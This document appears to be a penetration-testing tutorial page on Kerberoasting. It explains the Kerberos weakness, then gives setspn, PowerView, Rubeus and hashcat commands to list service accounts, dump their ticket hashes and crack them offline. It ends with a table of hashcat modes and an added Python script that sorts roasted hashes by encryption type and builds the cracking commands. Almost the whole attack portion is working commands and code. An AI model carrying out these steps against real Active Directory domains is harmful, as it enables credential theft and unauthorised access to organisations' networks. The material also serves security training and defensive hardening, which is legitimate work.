# Kerberoasting

#### Attack principle

In the second stage of Kerberos authentication (the TGS exchange), the service ticket returned in the TGS-REP is encrypted with the service account's key (the `server hash`; with RC4 that is the account's NTLM hash), so the ciphertext can be brute-forced offline to recover the service account's password. Any valid **domain user** can request a Kerberos service ticket (ST) for any SPN registered in the domain, so no special privilege is needed to obtain that material. In practice the attack pays off only against SPNs tied to user accounts with weak passwords; computer accounts have long random passwords that will not crack.

#### Exploitation

* Discover SPNs

List every SPN registered in the current domain (computer accounts included):

```
setspn -Q */*
```

or with PowerView, which returns only user accounts that have an SPN set, i.e. the Kerberoastable ones:

```
Get-NetUser -SPN
```

![](https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FwQO0CatDb438pesRVpMe%2F1673492396728.png?alt=media&token=f475646e-6eb3-488e-9d52-b4ff9eee3194)


* Run Rubeus directly to request the service ticket and dump the hash

```
.\Rubeus.exe kerberoast /user:fileserver /nowrap
```

`/user:` limits the roast to one account (omit it to roast every account that has an SPN); `/nowrap` prints each hash on a single line so it can be pasted straight into a file for hashcat.

![](https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FKNCrqJVkVYyFV1RLImIz%2F1673494181227.png?alt=media&token=8afb4b2c-10e9-4cdd-82da-57512fa35391)


* Crack with hashcat

```
hashcat.exe -m 13100 spnhash.txt pwd.txt --force
```

`--force` only suppresses hashcat's warnings (for example about the OpenCL runtime); run without it first and add it only if hashcat refuses to start.

![](https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FPowdhygKfKjqBtk84tTM%2F1673494360047.png?alt=media&token=973baf0e-fdac-4ba3-b632-331ed0ddf018)


Note:

hashcat must be run with the mode that matches the encryption type of the ticket, otherwise it rejects the hash or never finds the password. The prefix of each hash tells you which one: `$krb5tgs$23$...` is RC4, `$krb5tgs$17$...` is AES128 and `$krb5tgs$18$...` is AES256. Rubeus requests RC4 (etype 23) by default because it is far cheaper to crack; accounts restricted to AES in `msDS-SupportedEncryptionTypes` will only hand out etype 17/18 tickets.

| Mode    | Description                                           |
| ------- | ----------------------------------------------------- |
| `13100` | Kerberos 5 TGS-REP etype 23 (RC4)                     |
| `19600` | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) |
| `19700` | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) |
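Sorting roasted hashes into the right hashcat mode, as an added example (Python; this is not code from the page, from Rubeus or from hashcat). It parses the two line shapes Rubeus `/nowrap` emits (RC4: `$krb5tgs$23$*user$REALM$spn*$checksum$edata`; AES: `$krb5tgs$17$` or `$krb5tgs$18$` followed by `user$REALM$*spn*$checksum$edata`), maps the etype to the mode from the table above, and produces one input file and one hashcat command per mode so a mixed RC4/AES dump is never fed to a single `-m`. The account names, SPNs and hex values in `SAMPLE` are constructed, and `spnhash_<mode>.txt` / `pwd.txt` are assumed file names.

```python
"""Split Kerberoast output by etype and emit the matching hashcat command.

Added example; not part of the original page, Rubeus or hashcat.
The hash lines in SAMPLE are constructed (fake hex), not real captures.
"""
import re
from collections import defaultdict

# etype -> hashcat mode (the mapping from the table on the page)
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}

# RC4 shape: $krb5tgs$23$*user$REALM$spn*$checksum$edata
_RC4 = re.compile(
    r"^\$krb5tgs\$(23)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$[0-9a-f]+\$[0-9a-f]+$", re.I)
# AES shape:  $krb5tgs$17|18$user$REALM$*spn*$checksum$edata
_AES = re.compile(
    r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$[0-9a-f]+\$[0-9a-f]+$", re.I)

# Constructed sample of what a Rubeus /nowrap run might paste into a file
SAMPLE = """\
$krb5tgs$23$*sqlsvc$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$0123456789abcdef0123456789abcdef$deadbeefcafef00d
$krb5tgs$18$websvc$CORP.LOCAL$*HTTP/web01.corp.local*$0123456789abcdef01234567$deadbeefcafef00d
$krb5tgs$17$bkpsvc$CORP.LOCAL$*backup/bkp01.corp.local*$0123456789abcdef01234567$deadbeefcafef00d
this is not a hash
"""


def parse_hash(line):
    """Return etype, hashcat mode, user, realm and SPN for one hash line, or None."""
    line = line.strip()
    m = _RC4.match(line) or _AES.match(line)
    if not m:
        return None
    etype = int(m.group(1))
    return {"etype": etype, "mode": HASHCAT_MODE[etype],
            "user": m.group(2), "realm": m.group(3), "spn": m.group(4),
            "hash": line}


def plan_cracking(lines, prefix="spnhash", wordlist="pwd.txt"):
    """Group hashes by the hashcat mode they need; keep unparseable lines aside."""
    batches = defaultdict(list)
    skipped = []
    for raw in lines:
        if not raw.strip():
            continue
        parsed = parse_hash(raw)
        if parsed is None:
            skipped.append(raw.strip())
        else:
            batches[parsed["mode"]].append(parsed)
    commands = [f"hashcat -m {mode} {prefix}_{mode}.txt {wordlist}"
                for mode in sorted(batches)]
    return {"batches": dict(batches), "skipped": skipped, "commands": commands}


def write_batches(plan, prefix="spnhash"):
    """Write one input file per mode (hypothetical names) and return their paths."""
    paths = []
    for mode, entries in sorted(plan["batches"].items()):
        path = f"{prefix}_{mode}.txt"
        with open(path, "w") as fh:
            fh.write("".join(e["hash"] + "\n" for e in entries))
        paths.append(path)
    return paths


if __name__ == "__main__":
    plan = plan_cracking(SAMPLE.splitlines())
    for mode, entries in sorted(plan["batches"].items()):
        for e in entries:
            print(f"etype {e['etype']:2d} -> -m {mode}  {e['user']}@{e['realm']}  {e['spn']}")
    for bad in plan["skipped"]:
        print(f"skipped: {bad!r}")
    for cmd in plan["commands"]:
        print(cmd)
```

Feed it the file you saved from Rubeus instead of `SAMPLE` and call `write_batches` on the result; the AES entries are the accounts worth noting as a hardening win, since they cost orders of magnitude more per guess than the RC4 ones.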
